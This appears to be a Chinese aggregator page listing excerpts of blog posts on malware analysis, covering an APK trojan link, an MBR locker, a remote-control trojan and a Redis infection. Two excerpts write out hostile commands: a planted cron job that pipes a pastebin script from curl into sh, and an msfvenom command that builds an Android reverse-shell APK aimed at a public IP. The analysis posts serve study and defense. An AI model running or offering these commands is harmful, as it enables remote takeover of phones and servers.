原文:一次简单的分析手机APK病毒木马

写个笔记记录一下,起因是朋友在QQ上发了个连接叫我看看 安不安全,叫我帮他看看,反正在店里待着也没生意,那就顺便看看咯。 打开这个网址 会自动弹出下载一个名为OOXX的APK安装包。 起先我的思路是想先从这个网站下手 先搞定这个网站或者服务器吧, 然后我就去网站主页看了下。是一个网址缩短 变形 的网站。 那么我们给地址还原成真实地址,http: . . . : ooxx.apk 这就是真实的网址。 ...

2016-01-07 16:43 1 5283 推荐指数:

查看详情

一次MBR锁病毒分析

有一天,在机缘巧合之下我获得了一个锁软件(是多巧合阿喂!),然后兴高采烈的把它拖入了虚拟里蹂躏(>_<!)。 很巧,软件有虚拟检测。。。 Emmmm好吧,随便过一下。。。 我用的虚拟是VMware12,网上查到了一段过检测的代码 ...

Fri Dec 08 02:17:00 CST 2017 0 1081
一次病毒分析之旅

0x00 前言 这个病毒应该是比较简单的,别人给我的样本,让我帮忙看看,看样子是很早的一个病毒,针对Windows XP系统的,行为分析简单,但是想着不能就仅仅分析关键点,要不就把整个结构给逆向出来,弄了两天,搞的差不多了,简单的记录一下。 0x01 基本介绍 整个病毒是4个文件组成 ...

Tue Jan 05 04:58:00 CST 2016 17 4101
使用Kali的metasploit生成安卓APK木马控制安卓手机

使用Kali的metasploit生成安卓APK木马控制安卓手机 前提:在虚拟里面安装kali系统,再就是本机安装一个夜神模拟器,和一个安卓5的环境 如果不会的话,可以报名跟我们学习,联系方式hk007.cn 第一步:在终端输入ip addr命令查看kali主机的IP地址 ...

Mon Dec 07 06:32:00 CST 2020 0 3367
病毒木马防御与分析

病毒包和工具包下载:Github 一.前言 二.建立对手动查杀病毒技术的正确认识 1.病毒分析方法 2.病毒查杀步骤 3.必备知识 * 1) 熟悉windows系统进程 * 2) 熟悉常见端口与进程对应关系 * 3) 熟悉windows自带系统服务 ...

Wed Jan 16 02:07:00 CST 2019 4 775
【原创】一次远控木马分析

病毒来源:朋友服务器发现此木马 当时为了提样本搞了很久,一直找恢复文件,对提取样本有研究的朋友还请指导指导。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小 ...

Sat Jan 20 01:54:00 CST 2018 0 1606
一次redis病毒分析笔记

起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 ...

Wed Sep 05 23:13:00 CST 2018 2 944
msfconsole弄外网手机木马

创建个通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 现在我把这个apk导入到手机上然后运行 ...

Wed Jun 07 23:37:00 CST 2017 0 2509
一次小米手机安装Google Play(其他手机类似)

一次小米手机安装Google Play(其他手机类似) 最近换了一款小米10青春版,性价比很高,对于开发者而言,手机自带商店的软件内容往往不能满足需求,而需要单独定制习惯性的APP,博主通过最近的尝试,已经成功将内容安装到手机,并分享整理如下。 手机:小米10青春版 版本 ...

Tue Feb 16 18:18:00 CST 2021 0 2622
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM